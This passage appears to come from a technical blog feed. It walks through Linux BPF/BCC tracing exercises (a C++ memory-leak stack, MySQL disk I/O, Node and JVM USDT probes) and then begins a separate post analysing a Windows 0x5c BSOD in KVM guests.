void std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_emplace_back_aux<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x3e
std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::push_back(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x69
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x26
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move<false, false, std::input_iterator_tag>::__copy_m<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x52
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x7d
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a2<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xb6
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::copy<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xa8
word_counter::word_count[abi:cxx11]()+0xfc
</code></pre></div></div>
<p>The largest unreleased allocation comes from the copy call inside word_counter::word_count, and the std::shared_ptr to word_counter created in main is never released either. That is odd, since a shared_ptr destroys its object automatically when it goes out of scope. Time to look at the code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int main()
{
bool done = false;
while (!done)
{
auto reader = std::make_shared<input_reader>();
auto counter = std::make_shared<word_counter>(reader);
reader->set_counter(counter);
auto counts = counter->word_count();
done = counter->done();
for (auto const& wc : counts)
{
std::cout << wc.first << " " << wc.second << '\n';
}
}
return 0;
}
</code></pre></div></div>
<p>Now the cause is clear: reader and counter form a reference cycle, so the destructors of input_reader and word_counter can never run.</p>
<h2 id="6"> 6. Using BPF Tools: Database and Disk Stats and Stacks </h2>
<p>In this exercise we use BCC tools to observe disk performance as well as database query performance.</p>
<h3>Observing MySQL inserts</h3>
<p>First, install and start MySQL:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# apt install mysql-server
root@ubuntu1604:~/linux-tracing-workshop# systemctl start mysql
</code></pre></div></div>
<p>After creating a database, run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert
</code></pre></div></div>
<p>The script above inserts records continuously.</p>
<p>Running biotop shows that mysqld stays busy:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biotop
10:13:46 loadavg: 1.56 0.62 0.34 1/141 7738
PID COMM D MAJ MIN DISK I/O Kbytes AVGms
173 jbd2/vda1-8 W 253 0 vda 30 180 1.15
7007 mysqld W 253 0 vda 13 52 1.13
6985 mysqld W 253 0 vda 1 16 4.84
6989 mysqld W 253 0 vda 1 16 1.39
</code></pre></div></div>
<p>Inspect the details of individual I/O requests:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 mysqld 7007 vda W 11881528 4096 1.07
0.001324000 jbd2/vda1-8 173 vda W 1594504 8192 1.29
0.003013000 jbd2/vda1-8 173 vda W 1594520 4096 1.59
0.004724000 mysqld 7007 vda W 11881528 4096 1.06
0.005880000 jbd2/vda1-8 173 vda W 1594528 8192 1.12
0.007384000 jbd2/vda1-8 173 vda W 1594544 4096 1.40
0.009750000 mysqld 7007 vda W 11881528 4096 1.75
0.011242000 jbd2/vda1-8 173 vda W 1594552 8192 1.46
0.012463000 jbd2/vda1-8 173 vda W 1594568 4096 1.09
0.014872000 mysqld 7007 vda W 11881528 4096 1.79
0.015912000 jbd2/vda1-8 173 vda W 1594576 8192 1.01
0.017167000 jbd2/vda1-8 173 vda W 1594592 4096 1.14
0.019677000 mysqld 7007 vda W 11881528 4096 1.84
0.021173000 jbd2/vda1-8 173 vda W 1594600 8192 1.46
0.022514000 jbd2/vda1-8 173 vda W 1594616 4096 1.24
0.024218000 mysqld 7007 vda W 11881528 4096 1.07
0.025966000 jbd2/vda1-8 173 vda W 1594624 8192 1.72
0.027062000 jbd2/vda1-8 173 vda W 1594640 4096 1.00
0.028742000 mysqld 7007 vda W 11881528 4096 1.02
0.029930000 jbd2/vda1-8 173 vda W 1594648 8192 1.15
0.031019000 jbd2/vda1-8 173 vda W 1594664 4096 0.98
0.032752000 mysqld 7007 vda W 11881528 4096 1.06
0.033856000 jbd2/vda1-8 173 vda W 1594672 8192 1.07
0.035294000 jbd2/vda1-8 173 vda W 1594688 4096 1.33
</code></pre></div></div>
<p>Use biolatency to look at the latency distribution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 5
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 748 |************ |
1024 -> 2047 : 2425 |****************************************|
2048 -> 4095 : 74 |* |
4096 -> 8191 : 27 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 2 | |
32768 -> 65535 : 2 | |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 773 |************* |
1024 -> 2047 : 2370 |****************************************|
2048 -> 4095 : 78 |* |
4096 -> 8191 : 34 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 4 | |
32768 -> 65535 : 1 | |
</code></pre></div></div>
<p>Some I/O latencies are indeed quite high. Let's look at the kernel stacks that submit the I/O (this failed on my Ubuntu 16.04, possibly due to kernel build options):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> stackcount -i 10 submit_bio
</code></pre></div></div>
<p>Use fileslower to find the slow operations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./fileslower 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
5.901 rs:main Q:Reg 459 W 92 1.80 auth.log
6.479 mysqld 7007 W 1024 1.48 ib_logfile0
7.952 mysqld 7007 W 512 2.72 ib_logfile0
14.828 mysqld 7007 W 512 5.28 ib_logfile0
14.843 mysqld 7007 W 8704 2.41 ib_logfile0
19.573 mysqld 7007 W 512 2.84 ib_logfile0
36.177 mysqld 7007 W 512 2.98 ib_logfile0
44.049 mysqld 7007 W 512 1.32 ib_logfile0
45.975 mysqld 7007 W 512 2.69 ib_logfile0
45.992 mysqld 7007 W 512 5.47 ib_logfile0
63.595 mysqld 7007 W 512 1.29 ib_logfile0
</code></pre></div></div>
<p>Use filetop to see which files MySQL touches while inserting rows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./filetop
Tracing... Output every 1 secs. Hit Ctrl-C to end
10:27:08 loadavg: 1.78 1.61 1.12 1/139 7844
TID COMM READS WRITES R_Kb W_Kb T FILE
7844 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7844 clear 1 0 0 0 R libtinfo.so.5.9
7844 clear 1 0 0 0 R libc-2.23.so
7844 filetop 3 0 0 0 R clear
7844 filetop 2 0 0 0 R ld-2.23.so
7843 filetop 1 0 0 0 R id
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 239 0 166 R ib_logfile0
10:27:09 loadavg: 1.78 1.61 1.12 1/139 7845
TID COMM READS WRITES R_Kb W_Kb T FILE
7845 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7845 clear 1 0 0 0 R libtinfo.so.5.9
7845 clear 1 0 0 0 R libc-2.23.so
7845 filetop 3 0 0 0 R clear
7845 filetop 2 0 0 0 R ld-2.23.so
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 243 0 168 R ib_logfile0
</code></pre></div></div>
<p>Check how the interrupts generated by the I/O affect the system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./hardirqs 1
Tracing hard irq event time... Hit Ctrl-C to end.
HARDIRQ TOTAL_usecs
virtio1-input.0 161
virtio3-req.0 5684
HARDIRQ TOTAL_usecs
virtio0-input.0 2
virtio1-input.0 108
virtio3-req.0 5639
HARDIRQ TOTAL_usecs
virtio1-input.0 145
virtio3-req.0 5678
HARDIRQ TOTAL_usecs
virtio0-input.0 1
virtio1-input.0 134
virtio3-req.0 5891
HARDIRQ TOTAL_usecs
virtio1-input.0 116
virtio3-req.0 5869
</code></pre></div></div>
<h3>Observing MySQL queries</h3>
<p>Insert data and then select it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert_once
Inserting employees...
root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py select
Selecting employees...
</code></pre></div></div>
<p>biotop, biolatency, and fileslower all show no slow I/O operations; presumably the cache hit rate is good.</p>
<p>Start cachestat, then run the select again:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
1124 0 0 100.0% 0.0% 64 1531
5 2 3 28.6% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
</code></pre></div></div>
<p>Reads appear for a short window and then stop, which suggests MySQL implements its own internal cache.</p>
<p>After dropping the system page cache, we can confirm that few read operations actually occur:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# echo 1 > /proc/sys/vm/drop_caches
root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 0 88
4 0 0 100.0% 0.0% 0 88
6 5 4 18.2% 18.2% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
3 0 0 100.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
</code></pre></div></div>
<h2 id="7"> 7. Using BPF Tools: Node and JVM USDT Probes </h2>
<h3> Node </h3>
<p>Build a Node binary with USDT support; install systemtap-sdt-dev first:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ git clone https://github.com/nodejs/node.git
$ cd node
$ git checkout v6.2.1 # or whatever version is currently stable
$ ./configure --prefix=/opt/node --with-dtrace
$ make -j 3
$ sudo make install
</code></pre></div></div>
<p>Use tplist to list Node's USDT probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node
/root/node/node node:gc__start
/root/node/node node:gc__done
/root/node/node node:net__server__connection
/root/node/node node:net__stream__end
/root/node/node node:http__server__response
/root/node/node node:http__client__response
/root/node/node node:http__client__request
/root/node/node node:http__server__request
</code></pre></div></div>
<p>With node running, more USDT probes become visible:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -p $(pidof node)
/lib/x86_64-linux-gnu/libc-2.23.so libc:setjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp_target
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_free_list
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_sbrk_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_wait
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_retry
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_free
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_more
</code></pre></div></div>
<p>Show the details of a probe:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node -vv '*server__request'
/root/node/node node:http__server__request [sema 0x1c0a034]
location #1 0x1045cf8
argument #1 8 unsigned bytes @ r14
argument #2 8 unsigned bytes @ ax
argument #3 8 unsigned bytes @ *(bp - 4344)
argument #4 4 signed bytes @ *(bp - 4348)
argument #5 8 unsigned bytes @ *(bp - 4304)
argument #6 8 unsigned bytes @ *(bp - 4312)
argument #7 4 signed bytes @ *(bp - 4352)
</code></pre></div></div>
<p>The meaning of each argument is documented in node/src/node.stp:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> probe node_http_server_request = process("node").mark("http__server__request")
{
remote = user_string($arg3);
port = $arg4;
method = user_string($arg5);
url = user_string($arg6);
fd = $arg7;
probestr = sprintf("%s(remote=%s, port=%d, method=%s, url=%s, fd=%d)",
$$name,
remote,
port,
method,
url,
fd);
}
</code></pre></div></div>
<p>Start server.js:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ~/node/node server.js
</code></pre></div></div>
<p>In another terminal, start the trace:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
</code></pre></div></div>
<p>In a third terminal, send requests; arg5 and arg6 are the method and URL respectively:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/node/src# curl localhost:8080
Hello, world!root@ubuntu1604:~/node/src# curl localhost:8080/index.html
Hello, world!root@ubuntu1604:~/node/src# curl 'localhost:8080/login?user=dave&pwd=123'
Hello, world!root@ubuntu1604:~/node/src#
</code></pre></div></div>
<p>The second terminal shows the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
PID TID COMM FUNC -
25022 25022 node http__server__request GET /
25022 25022 node http__server__request GET /index.html
25022 25022 node http__server__request GET /login?user=dave&pwd=123
</code></pre></div></div>
<h3> JVM </h3>
<p>Download the <a href="https://github.com/mpujari/systemtap-tapset-openjdk9">tapset</a>.</p>
<p>Generate the tapset and look at the USDT probe definitions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9# ./create-tapset.sh /usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*class_loaded' *.stp
hotspot-1.9.0.stp:probe hotspot.class_loaded =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "class_loaded";
hotspot-1.9.0.stp- class = user_string_n($arg1, $arg2);
hotspot-1.9.0.stp- classloader_id = $arg3;
hotspot-1.9.0.stp- is_shared = $arg4;
hotspot-1.9.0.stp- probestr = sprintf("%s(class='%s',classloader_id=0x%x,is_shared=%d)",
hotspot-1.9.0.stp- name, class, classloader_id, is_shared);
hotspot-1.9.0.stp-}
</code></pre></div></div>
<p>Start slowy/App:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java slowy/App
</code></pre></div></div>
<p>List the process's probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# /usr/lib/jvm/java-9-openjdk-amd64/bin/jps
33757 sun.tools.jps.Jps
33727 App
root@ubuntu1604:~/bcc/tools# ./tplist.py -p 33727 '*class*loaded'
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__loaded
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__unloaded
root@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
<p>Start tracing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
</code></pre></div></div>
<p>Shut down slowy/App; the trace catches the classes loaded on shutdown:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
PID TID COMM FUNC -
33727 33728 java class__loaded java/lang/Shutdown
33727 33728 java class__loaded java/lang/Shutdown$Lock
</code></pre></div></div>
<p>Next, trace the probe arguments:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_entry' *.stp
hotspot-1.9.0.stp:probe hotspot.method_entry =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_entry";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_return' *.stp
hotspot-1.9.0.stp:probe hotspot.method_return =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_return";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
</code></pre></div></div>
<p>Arguments 2 and 4 are the class and method respectively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -p 33840 -C 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4' -T 5
[19:09:19]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:20]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:21]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:22]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1 arg4 = getBufIfOpen
4516 arg4 = isPrime
4516 arg4 = isSimplePrime
891794 arg4 = isDivisible
[19:09:23]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
2309 arg4 = isPrime
2309 arg4 = isSimplePrime
1036648 arg4 = isDivisible
[19:09:24]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1768 arg4 = isPrime
1768 arg4 = isSimplePrime
1039152 arg4 = isDivisible
[19:09:25]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1467 arg4 = isPrime
1467 arg4 = isSimplePrime
1038429 arg4 = isDivisible
[19:09:26]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1325 arg4 = isPrime
1325 arg4 = isSimplePrime
1038159 arg4 = isDivisible
</code></pre></div></div>
<p>We can see that most of the time is spent calling isDivisible.</p>
<p>Start slowy/App:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java -XX:-Inline -XX:+ExtendedDTraceProbes slowy/App
</code></pre></div></div>
<p>Trace method entry and return:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33918 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry "%s.%s", arg2, arg4' 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__return "%s.%s", arg2, arg4'
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
</code></pre></div></div>
<p>We can see a large number of method entries and returns (the returns were not displayed in time).</p>
Analysis of a 0x5c BSOD caused by timer interrupt in KVM when VMs reboot2017-11-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/11/27/clock-init-failed-bsod
<ul>
<li>
<p><a href="#0">Issue Description</a></p>
</li>
<li>
<p><a href="#1">Analysis in Windows kernel side</a></p>
</li>
<li>
<p><a href="#2">Analysis in KVM side</a></p>
</li>
<li>
<p><a href="#3">Reference</a></p>
</li>
</ul>
<h2 id="0">Issue Description</h2>
<p>Recently I was assigned a BSOD caused by rebooting a Windows guest on KVM, and I made a deep analysis of it.
Though I'm not 100% satisfied with the final conclusion, it still makes sense and is a good explanation. I got a lot of help from Wei Wang of Intel, Vadim Rozenfeld of Red Hat, and Paolo Bonzini of Red Hat; many thanks to them.</p>
<p>This issue is quite direct. Although it does not cause a BSOD every time, rebooting the Windows guest several times almost always triggers a BSOD with 0x5c(0x10b,3,0,0). Here is the summary information.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> FOLLOWUP_IP:
nt!InitBootProcessor+12a
fffff800`01c01d0a 413ac6 cmp al,r14b
SYMBOL_STACK_INDEX: 6
SYMBOL_NAME: nt!InitBootProcessor+12a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 59b946d1
IMAGE_VERSION: 6.1.7601.23915
FAILURE_BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:x64_0x5c_hal_clock_interrupt_not_received_nt!initbootprocessor+12a
FAILURE_ID_HASH: {829a944d-7639-05f1-a55f-2677354a890e}
kd> kb
# RetAddr : Args to Child : Call Site
00 fffff800`017b9662 : 00000000`0000010b fffff800`01854cc0 00000000`00000065 fffff800`01705514 : nt!DbgBreakPointWithStatus
01 fffff800`017ba44e : 00000000`00000003 00000000`00000000 fffff800`01705d70 00000000`0000005c : nt!KiBugCheckDebugBreak+0x12
02 fffff800`016c8f04 : 00000000`00000001 fffff800`0161e0b3 00000000`00002a43 00000000`00000000 : nt!KeBugCheck2+0x71e
03 fffff800`0161e2b4 : 00000000`0000005c 00000000`0000010b 00000000`00000003 00000000`00000000 : nt!KeBugCheckEx+0x104
